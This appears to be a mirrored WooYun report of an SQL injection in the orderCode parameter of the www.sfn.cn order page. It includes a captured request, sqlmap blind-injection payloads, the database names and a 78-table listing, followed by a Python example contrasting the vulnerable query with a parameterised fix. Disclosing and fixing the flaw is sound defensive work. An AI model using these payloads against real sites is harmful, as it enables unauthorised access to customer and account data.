WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops article online browsing -------- http://drop.zone.ci/
2015-01-05: Details have been sent to the vendor and are awaiting vendor handling
2015-01-06: Vendor has confirmed; details are disclosed to the vendor only
2015-01-16: Details disclosed to core white hats and experts in related fields
2015-01-26: Details disclosed to regular white hats
2015-02-05: Details disclosed to intern white hats
2015-02-12: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public
SQL injection can lead to leakage of large amounts of sensitive information
1. The affected function is as follows:
2. The captured request is as follows; the injectable parameter is orderCode:
POST http://www.sfn.cn/order HTTP/1.1
Host: www.sfn.cn
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.sfn.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.sfn.cn/order
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ko;q=0.2,ja;q=0.2,es;q=0.2
Cookie:

orderCode=150104154127207&payStatus=1
3. The database information obtained is as follows:
---
Place: POST
Parameter: orderCode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderCode=150104154127207' AND 1077=1077 AND 'yENh' LIKE 'yENh&payStatus=1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: orderCode=150104154127207' AND SLEEP(5) AND 'dLyU' LIKE 'dLyU&payStatus=1
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] sanfront
4. As further proof, the table information obtained is as follows:
Database: sanfront
[78 tables]
+----------------------------+
| domain                     |
| user                       |
| zone                       |
| account                    |
| accountAdd                 |
| accountRemove              |
| adminUser                  |
| agent_info                 |
| agent_price                |
| borrow_account             |
| borrow_account_detail      |
| cart                       |
| city                       |
| contact                    |
| country                    |
| cp_tempList                |
| cp_tempSort                |
| district                   |
| dns_records                |
| dns_rr                     |
| dns_zone                   |
| domainRRNum                |
| domain_history             |
| domain_redemption          |
| domain_status              |
| domain_transfer_in         |
| domain_transfer_owner      |
| email                      |
| general                    |
| general_transfer_in        |
| host                       |
| hosting                    |
| invoice                    |
| job_employ_education       |
| job_employ_family          |
| job_employ_registration    |
| job_employ_training        |
| job_employ_work_experience |
| lookup                     |
| newsInfo                   |
| newsSort                   |
| orderDetail                |
| orderInfo                  |
| original                   |
| password_apply             |
| pollMessage                |
| product                    |
| productEmail               |
| productHosting             |
| productPrice               |
| productVPS                 |
| productVirtualHost         |
| province                   |
| rechargeapply              |
| resource                   |
| revenue                    |
| revenue_apply              |
| role                       |
| role_task                  |
| rr                         |
| slides                     |
| task                       |
| task_resource              |
| tempList                   |
| tempSort                   |
| trustedSite                |
| trustedSiteDomain          |
| trustedSiteMaterial        |
| url_redirect               |
| user_role                  |
| user_task                  |
| user_transfer              |
| virtualHost                |
| vps                        |
| websiting                  |
| websiting_history          |
| wireless                   |
| wireless_transfer_in       |
+----------------------------+
See the detailed description.
Filter the input.
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-01-06 09:07
Vulnerability report received; forwarded to the technical department, fix in progress
2015-02-12: This vulnerability has been fixed
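To make the finding and the suggested fix concrete, the following is an added example (not code from the report or from the vendor): it places the string-spliced order lookup that produces this class of bug beside a hardened version that allow-lists orderCode and binds parameters, and replays sqlmap's boolean-based payload from step 3 against a constructed in-memory table. sqlite3 stands in for the MySQL back end so it runs offline; the orderInfo columns, the sample rows and the 15-digit code format are assumptions.

```python
import re
import sqlite3


def build_db():
    # Constructed stand-in for sanfront.orderInfo (real schema unknown).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orderInfo (orderCode TEXT, payStatus INTEGER, owner TEXT)")
    conn.executemany("INSERT INTO orderInfo VALUES (?, ?, ?)", [
        ("150104154127207", 1, "alice@example.invalid"),  # constructed sample rows
        ("150104154127208", 0, "bob@example.invalid"),
    ])
    return conn


def lookup_vulnerable(conn, order_code, pay_status):
    # Before: request parameters spliced straight into the SQL text. A payload
    # such as  ...207' AND 1077=1077 AND 'yENh' LIKE 'yENh  closes the quote and
    # turns the result set into a true/false oracle, which is what sqlmap used.
    sql = ("SELECT owner FROM orderInfo WHERE orderCode='%s' AND payStatus=%s"
           % (order_code, pay_status))
    return [row[0] for row in conn.execute(sql)]


ORDER_CODE_RE = re.compile(r"\d{15}")  # assumption: order codes are 15 digits


def lookup_fixed(conn, order_code, pay_status):
    # After: allow-list validation ("filter the input") plus a parameterised
    # query, so the value can never be interpreted as SQL.
    if not ORDER_CODE_RE.fullmatch(order_code):
        raise ValueError("invalid orderCode")
    if pay_status not in ("0", "1"):
        raise ValueError("invalid payStatus")
    sql = "SELECT owner FROM orderInfo WHERE orderCode=? AND payStatus=?"
    return [row[0] for row in conn.execute(sql, (order_code, int(pay_status)))]


def fixed_rejects(conn, order_code, pay_status):
    # True when the hardened lookup refuses the input instead of querying.
    try:
        lookup_fixed(conn, order_code, pay_status)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    oracle = "150104154127207' AND 1077=1077 AND 'yENh' LIKE 'yENh"
    print("vulnerable, true condition :", lookup_vulnerable(db, oracle, "1"))
    print("vulnerable, false condition:", lookup_vulnerable(db, oracle.replace("1077=1077", "1077=1078"), "1"))
    print("fixed rejects payload      :", fixed_rejects(db, oracle, "1"))
```

The vulnerable lookup returns a row for the true condition and nothing for the false one, which is exactly the blind oracle the report's sqlmap output relied on; the hardened lookup rejects the same input before any query runs.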